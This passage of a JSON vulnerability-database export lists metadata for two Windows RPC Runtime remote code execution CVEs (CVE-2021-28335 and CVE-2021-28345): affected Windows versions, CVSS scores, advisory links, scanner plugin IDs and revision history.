"cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-28335"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["NVD-CWE-noinfo"], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-04-20T09:36:35", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28335"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-20T09:36:35", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28335", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28335"}], "hash": "2dfbbe9cbcc1f763320af0bef2b190b0c694a03924b910c10e61e3a7ef07431b", "hashmap": [{"hash": "d8397aaca09c3d41cbbd37f93b216f7e", "key": "cpe23"}, {"hash": "6d84905b019502bd3eaa4877023487cd", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "c01fe05774715aa05bc943e6a8dd929b", "key": "title"}, {"hash": "46885432d02f07422a392f0361344d5e", "key": "modified"}, {"hash": "fc77117e0ee479069963cd2660be22a3", "key": "cvelist"}, {"hash": "49d7794af035193b64435dc16013c24a", "key": "extraReferences"}, {"hash": "71e119ef6aaf5bba62f971e181550712", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5b812c11bd119f970b8a32c5b252c9e", "key": "affectedSoftware"}, {"hash": "56dd3b90fdad5434b2e237c2d2c62919", "key": "cpeConfiguration"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "122bdba5509c507afa2962a93b3d1c93", "key": "cpe"}, {"hash": "797434013b6a54d859a5263bc756e7a6", "key": "cvss3"}, {"hash": "d24d5eda06467deeecf44cf03fa8473f", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28335", "id": "CVE-2021-28335", "immutableFields": [], "lastseen": "2021-04-20T09:36:35", "modified": "2021-04-19T19:25:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28335"], "reporter": "cve@mitre.org", "title": "CVE-2021-28335", "type": "cve", "viewCount": 1}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-04-20T09:36:35"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-28335"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T11:37:54", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28335"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-14T11:37:54", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28335", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28335"}], "hash": "a105ef27fdc7f4b74a530a5c1835711eac76f715772d161a634f8562bd272291", "hashmap": [{"hash": "6d84905b019502bd3eaa4877023487cd", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "10e7951da011c65d4009b29d53e0f777", "key": "extraReferences"}, {"hash": "c01fe05774715aa05bc943e6a8dd929b", "key": "title"}, {"hash": "fc77117e0ee479069963cd2660be22a3", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "71e119ef6aaf5bba62f971e181550712", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "d24d5eda06467deeecf44cf03fa8473f", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "40c747f3c7fe2582f50d51b1b5116564", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28335", "id": "CVE-2021-28335", "immutableFields": [], "lastseen": "2021-04-14T11:37:54", "modified": "2021-04-13T20:35:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28335"], "reporter": "cve@mitre.org", "title": "CVE-2021-28335", "type": "cve", "viewCount": 1}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-14T11:37:54"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d5b812c11bd119f970b8a32c5b252c9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "122bdba5509c507afa2962a93b3d1c93"}, {"key": "cpe23", "hash": "d8397aaca09c3d41cbbd37f93b216f7e"}, {"key": "cpeConfiguration", "hash": "64c56abb30602eab96958881fd107551"}, {"key": "cvelist", "hash": "fc77117e0ee479069963cd2660be22a3"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "71e119ef6aaf5bba62f971e181550712"}, {"key": "extraReferences", "hash": "49d7794af035193b64435dc16013c24a"}, {"key": "href", "hash": "d24d5eda06467deeecf44cf03fa8473f"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "46885432d02f07422a392f0361344d5e"}, {"key": "published", "hash": "466c447b6119a8be9494fae20b17c9a1"}, {"key": "references", "hash": "6d84905b019502bd3eaa4877023487cd"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "c01fe05774715aa05bc943e6a8dd929b"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "6920b0ea32710635595b71c0c9c473fa6f581fde890b1554b7f87b3a438c12af", "viewCount": 27, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2021-28335"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001342.NASL"]}, {"type": "kaspersky", "idList": ["KLA12142", "KLA12139"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}], "modified": "2021-04-28T11:49:18", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2021-04-28T11:49:18", "rev": 2}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}]}}, "objectVersion": "1.5", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28335", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28335"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null}, {"id": "CVE-2021-28345", "bulletinFamily": "NVD", "title": "CVE-2021-28345", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "published": "2021-04-13T20:15:00", "modified": "2021-04-19T18:31:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28345", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28345"], "cvelist": ["CVE-2021-28345"], "immutableFields": [], "type": "cve", "lastseen": "2021-04-28T11:49:18", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": 